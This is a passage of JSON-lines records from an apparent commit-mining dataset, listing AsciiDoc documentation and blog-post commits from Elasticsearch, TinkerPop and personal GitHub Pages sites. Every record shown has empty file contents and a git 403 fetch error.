palecur\/elasticsearch,mm0\/elasticsearch,huanzhong\/elasticsearch,ckclark\/elasticsearch,lmtwga\/elasticsearch,amit-shar\/elasticsearch,elancom\/elasticsearch,yynil\/elasticsearch,diendt\/elasticsearch,wayeast\/elasticsearch,girirajsharma\/elasticsearch,vvcephei\/elasticsearch,djschny\/elasticsearch,18098924759\/elasticsearch,xingguang2013\/elasticsearch,smflorentino\/elasticsearch,slavau\/elasticsearch,kubum\/elasticsearch,girirajsharma\/elasticsearch,wuranbo\/elasticsearch,vrkansagara\/elasticsearch,F0lha\/elasticsearch,s1monw\/elasticsearch,vvcephei\/elasticsearch,mute\/elasticsearch,jsgao0\/elasticsearch,cwurm\/elasticsearch,huanzhong\/elasticsearch,NBSW\/elasticsearch,Liziyao\/elasticsearch,tkssharma\/elasticsearch,strapdata\/elassandra5-rc,ESamir\/elasticsearch,obourgain\/elasticsearch,rhoml\/elasticsearch,pritishppai\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,abibell\/elasticsearch,smflorentino\/elasticsearch,zeroctu\/elasticsearch,HarishAtGitHub\/elasticsearch,gmarz\/elasticsearch,dataduke\/elasticsearch,rhoml\/elasticsearch","old_file":"docs\/reference\/modules\/cluster.asciidoc","new_file":"docs\/reference\/modules\/cluster.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd9c07fd7a299c3351af2cef76277752ae8b3228","subject":"Added new 3.3.x upgrade doc file.","message":"Added new 3.3.x upgrade doc 
file.\n","repos":"robertdale\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,artem-aliev\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,BrynCooke\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,jorgebay\/tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/incubator-tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop","old_file":"docs\/src\/upgrade\/release-3.3.x.asciidoc","new_file":"docs\/src\/upgrade\/release-3.3.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f7bfd8a9b7974286fe9024d0f70617ee725cc89","subject":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation.adoc","message":"Update 2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation.adoc","new_file":"_posts\/2016-10-29-An-Easy-Way-to-Understand-Quaternion-and-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b717db930d64aaa7efaa28a60b80c9fc8296c91f","subject":"Create data_content.adoc","message":"Create data_content.adoc\n\nCreated data content page","repos":"EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4","old_file":"webapps\/core\/src\/main\/asciidoc\/data_content.adoc","new_file":"webapps\/core\/src\/main\/asciidoc\/data_content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBIBioSamples\/biosamples-v4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdbded868f75f73a1d28826b45949505f8519ca4","subject":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","message":"Update 2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_file":"_posts\/2017-03-26-Ngetes-Efek-Gitar-Pedal-AMT-P-1-MXR-Ten-Band.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bb7091f646c8e4d8b486fe4b80aa93adb5a645b","subject":"`force` is deprecated be mentioned at the end. (#21731)","message":"`force` is deprecated be mentioned at the end. 
(#21731)\n\n","repos":"fforbeck\/elasticsearch,MaineC\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,umeshdangat\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,wuranbo\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,lks21c\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,spiegela\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,Shepard1212\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,fforbeck\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,geidies\/elasticsearch,kalimatas\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,JSCooke\/elasticsearch,njlawton\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,ZTE-PaaS\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,robin13\/elasticsearch,MaineC\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,wangtuo\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,JSCooke\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,winstonewert\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,maddin20
16\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,StefanGor\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,rlugojr\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,IanvsPoplicola\/elasticsearch,brandonkearby\/elasticsearch,mikemccand\/elasticsearch,MaineC\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,henakamaMSFT\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,jimczi\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,Helen-Zhao\/elasticsearch,pozhidaevak\/elasticsearch,njlawton\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,a2lin\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,ZTE-PaaS\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticse
arch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,fforbeck\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,fred84\/elasticsearch,spiegela\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,markwalkom\/elasticsearch,spiegela\/elasticsearch,spiegela\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,Stacey-Gammon\/elasticsearch,bawse\/elasticsearch,elasticdog\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,masaruh\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,fforbeck\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch","old_file":"docs\/reference\/docs\/get.asciidoc","new_file":"docs\/reference\/docs\/get.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"071c0c7a143f3306a43c948d09299b3d2694ecef","subject":"Update 2015-05-22-Episode-18-Two-and-Done.adoc","message":"Update 2015-05-22-Episode-18-Two-and-Done.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-05-22-Episode-18-Two-and-Done.adoc","new_file":"_posts\/2015-05-22-Episode-18-Two-and-Done.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72da6400792b093cc4e5aa16633a289261f1eab0","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd7925313b3d2184270e3970cfdeaa2093105f4c","subject":"Update 2015-04-20-Episode-17-Big-Nuts.adoc","message":"Update 
2015-04-20-Episode-17-Big-Nuts.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-04-20-Episode-17-Big-Nuts.adoc","new_file":"_posts\/2015-04-20-Episode-17-Big-Nuts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd90814d9a687c8d3b5b0f22f6eb9e40d27bcba4","subject":"Update 2015-09-07-Herzlich-willkommen.adoc","message":"Update 2015-09-07-Herzlich-willkommen.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-09-07-Herzlich-willkommen.adoc","new_file":"_posts\/2015-09-07-Herzlich-willkommen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8bf3be757ee43f976aa3dcf03b931b4544b7883b","subject":"Update Nov-11-2015-Hoka-One-One.adoc","message":"Update Nov-11-2015-Hoka-One-One.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/Nov-11-2015-Hoka-One-One.adoc","new_file":"_posts\/Nov-11-2015-Hoka-One-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b31184ae6ef29cbdf7187cb237ead176e2aafe5c","subject":"Update 2016-11-15-231000-Thursday-Morning.adoc","message":"Update 2016-11-15-231000-Thursday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-231000-Thursday-Morning.adoc","new_file":"_posts\/2016-11-15-231000-Thursday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e120e40465644251f684aeed6d11ea4a2176d8f","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09930b02abcf699910e2846bfbf1642c89a60be5","subject":"Update 2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","message":"Update 
2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-11-23-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb0493a21cfa444e181ddcf0967a7c7ad03a2fc3","subject":"add spring integration doc","message":"add spring integration doc\n","repos":"cache2k\/cache2k,cache2k\/cache2k,cache2k\/cache2k","old_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_spring.adoc","new_file":"documentation\/src\/docs\/asciidoc\/user-guide\/sections\/_spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cache2k\/cache2k.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3eb429dae7e279ad7b8149fa8fbed807b77825fe","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e0571bef23bab8ffdc05a1599b57c4e5e9e0bd4","subject":"Update 2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","message":"Update 2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","new_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-Unlink-from-your-guthub-account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e0eed322be6cfdbf7ced406b93c6fd413528643","subject":"Update 2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","message":"Update 2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","new_file":"_posts\/2011-07-24-Code-Quickie-1-conversion-and-final-keyword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03d09d0287c9ee5880af8a91d06acb41962a2ce8","subject":"Update 
2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"becd5e355fe563b8659086e4f80cf2e96dc68f60","subject":"y2b create post PlayStation 3D Display Unboxing \\u0026 Review","message":"y2b create post PlayStation 3D Display Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-13-PlayStation-3D-Display-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-11-13-PlayStation-3D-Display-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"486b5446be62aaa61be91a32ff375710e5ba6c55","subject":"y2b create post The Tiny Snack Gadget You Need To Know About","message":"y2b create post The Tiny Snack Gadget You Need To Know About","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-11-The-Tiny-Snack-Gadget-You-Need-To-Know-About.adoc","new_file":"_posts\/2016-08-11-The-Tiny-Snack-Gadget-You-Need-To-Know-About.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26c65f53cddd834bc3ac5c42b851d70fe7cb14c3","subject":"Update 2015-11-10-Article-Test.adoc","message":"Update 2015-11-10-Article-Test.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2015-11-10-Article-Test.adoc","new_file":"_posts\/2015-11-10-Article-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"810602b536e894206f7fbfef5bb29cb91eaae711","subject":"Update 2016-04-04-Desde-afuera.adoc","message":"Update 2016-04-04-Desde-afuera.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_file":"_posts\/2016-04-04-Desde-afuera.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"330105084a7a5fa21069972c2b1c3325d8c4e5e4","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 
2016-11-22-Sweet-Potato.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_file":"_posts\/2016-11-22-Sweet-Potato.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"990f81dff6a9d3843b40bba95cd84a3f5b91de02","subject":"Update 2017-01-10-i-O-S-1890000.adoc","message":"Update 2017-01-10-i-O-S-1890000.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-01-10-i-O-S-1890000.adoc","new_file":"_posts\/2017-01-10-i-O-S-1890000.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a47189a275a53f6a6e0aa67790b98a756d8ea6","subject":"y2b create post Vestal Observer Watch Unboxing \\u0026 Overview","message":"y2b create post Vestal Observer Watch Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-21-Vestal-Observer-Watch-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-21-Vestal-Observer-Watch-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf3d9456bdb29c19ae93467a30e4fae15b6ba458","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 